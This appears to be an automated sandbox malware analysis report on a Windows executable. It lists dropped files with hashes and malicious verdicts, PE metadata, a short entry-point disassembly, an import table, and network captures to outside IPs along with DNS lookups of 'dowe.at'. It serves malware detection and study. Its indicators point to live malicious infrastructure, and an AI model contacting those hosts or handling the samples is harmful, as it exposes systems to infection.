                    SHA1: 3EC49B493F90C8EFA19791C3B209ED0E12571597
                    SHA-256: D764C68A2933F74A24F55FC5A5F2196F21F480B45050B2453DE8A4E3414AA7B5
                    SHA-512: C5F9E6EF985783BD64DE5E8D710A5E3B8683F94B17E7FA26BA24FF212D59E29DAC1E91EF9B39E70424F1D60E378EBB16122C24E1E84864A4AF760F2C27AA393A
                    Malicious: false
                    Reputation: low
                    Process: C:\Windows\SysWOW64\WerFault.exe
                    File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category: dropped
                    Size (bytes): 8300
                    Entropy (8bit): 3.685442373729347
                    Encrypted: false
                    SSDEEP: 192:Rrl7r3GLNibK6ha0ZD6Yqf6waEgmfTMSmDCprG89bxZdPsfezZFm:RrlsNiG6haID6YK6waEgmfTMSm8xz0f/
                    MD5: 42BF5C06FE5E8831D8CE69305340AD29
                    SHA1: C7520BAB8F0C88EFBC5978AD7935EC96D2302F64
                    SHA-256: DB24A8015F5D0F08788DCF361FB862360309BF58424A46B40F171A6823F55AA0
                    SHA-512: BEC099C7C3A11EEF2C57EB72CD63A7CBD54B5AE8360AAB0619BC6BAFB015958C74635D087D9E4AE18F04C1BD0ADE0AB700DF3D4425FF877497AE0CCD2EDD9C87
                    Malicious: false
                    Reputation: low
                    Process: C:\Windows\SysWOW64\WerFault.exe
                    File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                    Category: dropped
                    Size (bytes): 4640
                    Entropy (8bit): 4.458377130044554
                    Encrypted: false
                    SSDEEP: 48:cvIwSD8zsZJgtWI9GgWgc8sqYjf8fm8M4JCdsFIAaFok+q8/RgEAd4SrSed:uITfrtZgrsqYQJvIakE1MDWed
                    MD5: D4368A447707DE8D83F7436078D8256F
                    SHA1: FDF53267338C0952A6E2DD6068F84231CD8EEAA8
                    SHA-256: 2E04AD13C67C592A218330DD8EE0FAA5CE495AD4CA411ED5B137B7BBF20702EC
                    SHA-512: 6501494A3D39F7D44802703508A10357AA32211B8BBA3C7F93766372132C2F8B8637ACD60B756E18A9A35E53BB1DC2E48407E248589F57E5ED77E86C8868B9E5
                    Malicious: false
                    Reputation: low
                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1802482" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                    Process: C:\Windows\explorer.exe
                    File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Category: modified
                    Size (bytes): 478208
                    Entropy (8bit): 7.834422761413108
                    Encrypted: false
                    SSDEEP: 6144:i+i6S2IYNFu4Ldu//tUVBcR3QQtZ2b6ptsDCsJnQAC+iVjQoFsLVCcde2Zq3mLW:q2IgEYKKq3QQWFCRX4ccdecU
                    MD5: C81AB83835C2669DBE57C43DB54571B7
                    SHA1: C06EE015340CBDFAA7AF2E820A8EE166179B09E2
                    SHA-256: 727AC1966886E3D083330FCDE19D79C445DE9FE2A0E306F9FEB94D28BE54F776
                    SHA-512: 4BA429D9A37D1A3B1C72029DB9D86E44B30DB40EB05CF8248CD6B7BC6CD332B25605B0A84CC6E63DA6F55191A0FA5D91B9C2610E2C30E232844C6AB37F0B0657
                    Malicious: true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Process: C:\Windows\explorer.exe
                    File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Category: dropped
                    Size (bytes): 3776000
                    Entropy (8bit): 7.994112157171111
                    Encrypted: true
                    SSDEEP: 98304:CIPeMtJl37YfXo0/PrjRkwoD8sOr+616vbgD7op:CIPeMh37YfXZPvRkww3OrNEgo
                    MD5: 2479739C5D062ECB325147623241F007
                    SHA1: 4394B6D2CA4ED82A5F2D70D10CD05CFA3B35AB2C
                    SHA-256: 728DE9789AF5F2EBC9AC2FAC80FEE25B186BC5B3ACB960650934377F0C77726D
                    SHA-512: 1C5C4D7D7FD5A7F18FED87A0D66B95B26EBFDA33B4AA4F66FD8FD4432E07EBC6E6289A27FFCCC1CF99E659AEB80434E833BAA299AB140D82C0BCB7D863A58301
                    Malicious: true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Process: C:\Users\user\AppData\Local\Temp\ADCA.exe
                    File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category: dropped
                    Size (bytes): 4494336
                    Entropy (8bit): 6.5734549407418505
                    Encrypted: false
                    SSDEEP: 98304:2Ekp3AUUgGFofLw++PxAbc5rh5Ar/04TA4P:gp31UtFmLw95Abc5rh5Ar/NTA
                    MD5: AA90603343B982D2D28D56CCE94C696E
                    SHA1: 8E1ED433C2958BDA927279C0D47C4C4B7C39290C
                    SHA-256: 07F50A84E6567DF42216C4F1C640AEAC436B19340CCCB82B21EFAB2E1F9F3FB1
                    SHA-512: CEC1F4B745B0F2A54AF74C32E6F3631589D2795E1396FEB3E1C51198C16A985F871D915EC9F988F763A7774F96F76AA922D3BF9EF3195BD44443E633814A0B09
                    Malicious: true
                    Process: C:\Windows\explorer.exe
                    File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Category: dropped
                    Size (bytes): 149504
                    Entropy (8bit): 7.100027517135632
                    Encrypted: false
                    SSDEEP: 3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                    MD5: 1CF06BEB83D2BD1AFD1B9B62994E7549
                    SHA1: 88BD7DA7668FB669B5503696EE0A9C0F2DBECEB7
                    SHA-256: 4DC0DE570728F75F844C7AFB84AC6C809EF4620DAC3B12A884FF9916F5B5B0EE
                    SHA-512: 79196551EDCB7850817C3132971D25423BD6861849E21926E03647B0D4EE76D3EE7CBE456C78D046167F196991E3D286C393A8ABC22E8218ED148BC90090FFD9
                    Malicious: true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Process: C:\Windows\explorer.exe
                    File Type: ASCII text, with CRLF line terminators
                    Category: dropped
                    Size (bytes): 26
                    Entropy (8bit): 3.95006375643621
                    Encrypted: false
                    SSDEEP: 3:ggPYV:rPYV
                    MD5: 187F488E27DB4AF347237FE461A079AD
                    SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious: true
                    Preview: [ZoneTransfer]....ZoneId=0
                    File type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit): 7.100027517135632
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name: file.exe
                    File size: 149504
                    MD5: 1cf06beb83d2bd1afd1b9b62994e7549
                    SHA1: 88bd7da7668fb669b5503696ee0a9c0f2dbeceb7
                    SHA256: 4dc0de570728f75f844c7afb84ac6c809ef4620dac3b12a884ff9916f5b5b0ee
                    SHA512: 79196551edcb7850817c3132971d25423bd6861849e21926e03647b0d4ee76d3ee7cbe456c78d046167f196991e3d286c393a8abc22e8218ed148bc90090ffd9
                    SSDEEP: 3072:TD+CPq0Ubn6u2DUp5Gcw2FPOXDMMMMfq2SQw7Se1Ei4KY+NzfOFV:W0qln6u2I8q25wV4V+NzcV
                    TLSH: 02E3D0013690E072C19348755931C2F17B3BBA32E8B9894B7B5446AF4F722D2BB3674B
                    Icon Hash: d0b4b0e0e0eaf0c0
                    Entrypoint: 0x404c97
                    Entrypoint Section: .text
                    Digitally signed: false
                    Imagebase: 0x400000
                    Subsystem: windows gui
                    Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp: 0x61352E95 [Sun Sep 5 20:54:45 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major: 5
                    OS Version Minor: 0
                    File Version Major: 5
                    File Version Minor: 0
                    Subsystem Version Major: 5
                    Subsystem Version Minor: 0
                    Import Hash: 2ac0f7085258eff31142b9f87cb0f218
                    Instruction
                    call 00007F9AF0E4AECCh
                    jmp 00007F9AF0E450ADh
                    sub eax, 000003A4h
                    je 00007F9AF0E45254h
                    sub eax, 04h
                    je 00007F9AF0E45249h
                    sub eax, 0Dh
                    je 00007F9AF0E4523Eh
                    dec eax
                    je 00007F9AF0E45235h
                    xor eax, eax
                    ret
                    mov eax, 00000404h
                    ret
                    mov eax, 00000412h
                    ret
                    mov eax, 00000804h
                    ret
                    mov eax, 00000411h
                    ret
                    mov edi, edi
                    push esi
                    push edi
                    mov esi, eax
                    push 00000101h
                    xor edi, edi
                    lea eax, dword ptr [esi+1Ch]
                    push edi
                    push eax
                    call 00007F9AF0E4643Eh
                    xor eax, eax
                    movzx ecx, ax
                    mov eax, ecx
                    mov dword ptr [esi+04h], edi
                    mov dword ptr [esi+08h], edi
                    mov dword ptr [esi+0Ch], edi
                    shl ecx, 10h
                    or eax, ecx
                    lea edi, dword ptr [esi+10h]
                    stosd
                    stosd
                    stosd
                    mov ecx, 004219A8h
                    add esp, 0Ch
                    lea eax, dword ptr [esi+1Ch]
                    sub ecx, esi
                    mov edi, 00000101h
                    mov dl, byte ptr [ecx+eax]
                    mov byte ptr [eax], dl
                    inc eax
                    dec edi
                    jne 00007F9AF0E45229h
                    lea eax, dword ptr [esi+0000011Dh]
                    mov esi, 00000100h
                    mov dl, byte ptr [eax+ecx]
                    mov byte ptr [eax], dl
                    inc eax
                    dec esi
                    jne 00007F9AF0E45229h
                    pop edi
                    pop esi
                    ret
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    sub esp, 0000051Ch
                    mov eax, dword ptr [004225B0h]
                    xor eax, ebp
                    mov dword ptr [ebp-04h], eax
                    push ebx
                    push edi
                    lea eax, dword ptr [ebp-00000518h]
                    push eax
                    push dword ptr [esi+04h]
                    call dword ptr [00401170h]
                    mov edi, 00000100h
                    Programming Language:
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [C++] VS2008 build 21022
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10a9c | 0x50 | .text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x3050 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1280 | 0x1c | .text
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2cd8 | 0x40 | .text
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x23c | .text
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x107d4 | 0x10800 | False | 0.5119702888257576 | data | 6.1002379149502355 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data | 0x12000 | 0x44268 | 0x10a00 | False | 0.9444313909774437 | data | 7.840969501400703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x57000 | 0x3050 | 0x3200 | False | 0.62859375 | data | 5.648259802287169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country
                    JEBOPOZUSUHARAFA | 0x59430 | 0x55f | ASCII text, with very long lines (1375), with no line terminators | Raeto-Romance | Switzerland
                    RT_ICON | 0x572b0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x57978 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x57ee0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Raeto-Romance | Switzerland
                    RT_ICON | 0x58f88 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Raeto-Romance | Switzerland
                    RT_STRING | 0x59b78 | 0x2d8 | data | Raeto-Romance | Switzerland
                    RT_STRING | 0x59e50 | 0x1fc | data | Raeto-Romance | Switzerland
                    RT_ACCELERATOR | 0x59990 | 0xa0 | data | Raeto-Romance | Switzerland
                    RT_GROUP_ICON | 0x593f0 | 0x3e | data | Raeto-Romance | Switzerland
                    RT_VERSION | 0x59a30 | 0x148 | x86 executable not stripped | |
                    DLL | Import
                    KERNEL32.dll | OpenMutexW, GetConsoleAliasExesLengthA, CopyFileExA, ReadConsoleOutputCharacterW, CompareStringW, SetVolumeLabelA, FillConsoleOutputAttribute, GetConsoleTitleA, QueryDosDeviceW, EnumCalendarInfoExA, GetProcessPriorityBoost, IsProcessInJob, AddConsoleAliasW, CreateFileW, SetMailslotInfo, GetWindowsDirectoryW, GetModuleHandleA, GlobalLock, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, OpenWaitableTimerA, GetVersionExA, SearchPathA, MoveFileExW, CallNamedPipeW, GetCurrentDirectoryW, GetDriveTypeA, CreateMailslotA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, LocalAlloc, GetBinaryTypeA, GetCPInfoExW, WriteConsoleOutputA, GetCommandLineA, EnumDateFormatsW, CancelTimerQueueTimer, GetHandleInformation, FindResourceA, CreateJobObjectA, FindFirstVolumeA, GlobalFlags, CreateNamedPipeW, InterlockedIncrement, CloseHandle, CopyFileW, GetComputerNameExA, GetShortPathNameA, FlushFileBuffers, GetLogicalDriveStringsW, InterlockedCompareExchange, EnumCalendarInfoW, GetConsoleAliasExesLengthW, InterlockedExchange, GetNamedPipeHandleStateW, GetModuleHandleW, GetCurrentActCtx, GenerateConsoleCtrlEvent, MoveFileW, AddAtomA, SetThreadPriority, FreeEnvironmentStringsW, SetConsoleTitleW, SetVolumeMountPointW, VirtualAlloc, _hread, EnumResourceLanguagesW, ClearCommBreak, QueryMemoryResourceNotification, GlobalFindAtomA, HeapWalk, SetFilePointer, GetTickCount, EnumSystemCodePagesW, VerifyVersionInfoA, LoadLibraryW, CreateFileA, GetLastError, WideCharToMultiByte, HeapReAlloc, HeapAlloc, HeapFree, UnhandledExceptionFilter, SetUnhandledExceptionFilter, DeleteFileA, GetStartupInfoA, GetCPInfo, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, HeapCreate, VirtualFree, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, RtlUnwind, InitializeCriticalSectionAndSpinCount, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, HeapSize, ReadFile
                    GDI32.dll | GetCharWidthA, GetCharABCWidthsA
                    WINHTTP.dll | WinHttpSetOption
                    Language of compilation system | Country where language is spoken
                    Raeto-Romance | Switzerland
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 30, 2022 00:11:05.019609928 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:05.307938099 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213625908 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213686943 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.213804007 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:06.220859051 CET4972480192.168.2.6211.59.14.90
                    Nov 30, 2022 00:11:06.239725113 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.507853985 CET8049724211.59.14.90192.168.2.6
                    Nov 30, 2022 00:11:06.509285927 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.509438038 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.509569883 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779181957 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779318094 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779341936 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779361963 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779381037 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779402018 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779421091 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779442072 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779469967 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779474974 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779491901 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779517889 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779524088 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:06.779562950 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:06.779591084 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049257040 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049336910 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049379110 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049421072 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049422979 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049462080 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049470901 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049504042 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049546957 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049582005 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049603939 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049649954 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049675941 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049690962 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049731970 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049753904 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049786091 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049829006 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049858093 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049870014 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049920082 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049925089 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.049959898 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.049999952 CET8049725123.253.32.170192.168.2.6
                    Nov 30, 2022 00:11:07.050004005 CET4972580192.168.2.6123.253.32.170
                    Nov 30, 2022 00:11:07.050044060 CET8049725123.253.32.170192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 30, 2022 00:10:57.539028883 CET | 62910 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:10:58.022703886 CET | 53 | 62910 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:10:59.104090929 CET | 63863 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:10:59.585829020 CET | 53 | 63863 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:01.073633909 CET | 62538 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:01.562983036 CET | 53 | 62538 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:03.599140882 CET | 54903 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:03.619827986 CET | 53 | 54903 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:04.708935022 CET | 51530 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:04.729224920 CET | 53 | 51530 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:20.956633091 CET | 61609 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:20.978972912 CET | 53 | 61609 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:22.561232090 CET | 52481 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:22.578528881 CET | 53 | 52481 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:23.650019884 CET | 53943 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:24.170435905 CET | 53 | 53943 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:25.679337978 CET | 56086 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:25.698915958 CET | 53 | 56086 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:27.249752998 CET | 56547 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:27.268702984 CET | 53 | 56547 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:29.865735054 CET | 59881 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:29.909164906 CET | 53 | 59881 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:34.537358999 CET | 58917 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:34.555744886 CET | 53 | 58917 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:35.817455053 CET | 62520 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:35.837424994 CET | 53 | 62520 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:37.053144932 CET | 55629 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:37.070822954 CET | 53 | 55629 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:38.141012907 CET | 52079 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:38.159097910 CET | 53 | 52079 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:39.139863968 CET | 56569 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:39.178725958 CET | 53 | 56569 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:40.692821026 CET | 61833 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:40.713022947 CET | 53 | 61833 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:41.800481081 CET | 65044 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:41.821110964 CET | 53 | 65044 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:42.937369108 CET | 60032 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:42.970715046 CET | 53 | 60032 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:44.522392035 CET | 49232 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:44.541811943 CET | 53 | 49232 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:45.507319927 CET | 56123 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:45.526927948 CET | 53 | 56123 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:47.124767065 CET | 59752 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:47.144521952 CET | 53 | 59752 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:48.973812103 CET | 52865 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:48.991724968 CET | 53 | 52865 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:50.177469969 CET | 57322 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:50.196737051 CET | 53 | 57322 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:51.373785019 CET | 62958 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:51.391386986 CET | 53 | 62958 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:52.608006954 CET | 64404 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:52.630928993 CET | 53 | 64404 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:53.755806923 CET | 62848 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:53.780193090 CET | 53 | 62848 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:55.344466925 CET | 55956 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:55.366202116 CET | 53 | 55956 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:56.383055925 CET | 51321 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:56.403703928 CET | 53 | 51321 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:57.562014103 CET | 61089 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:58.053072929 CET | 53 | 61089 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:11:59.303905010 CET | 62766 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:11:59.321430922 CET | 53 | 62766 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:12:00.410181999 CET | 60130 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:12:00.430341005 CET | 53 | 60130 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:12:01.524296045 CET | 62732 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:12:01.541763067 CET | 53 | 62732 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:12:03.480338097 CET | 60690 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:12:03.497956991 CET | 53 | 60690 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:12:05.245548010 CET | 56750 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:12:05.265032053 CET | 53 | 56750 | 8.8.8.8 | 192.168.2.6
Nov 30, 2022 00:12:07.934282064 CET | 59336 | 53 | 192.168.2.6 | 8.8.8.8
Nov 30, 2022 00:12:07.953203917 CET | 53 | 59336 | 8.8.8.8 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 30, 2022 00:10:57.539028883 CET | 192.168.2.6 | 8.8.8.8 | 0x8dc7 | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
Nov 30, 2022 00:10:59.104090929 CET | 192.168.2.6 | 8.8.8.8 | 0x7cfc | Standard query (0) | dowe.at | A (IP address) | IN (0x0001) | false
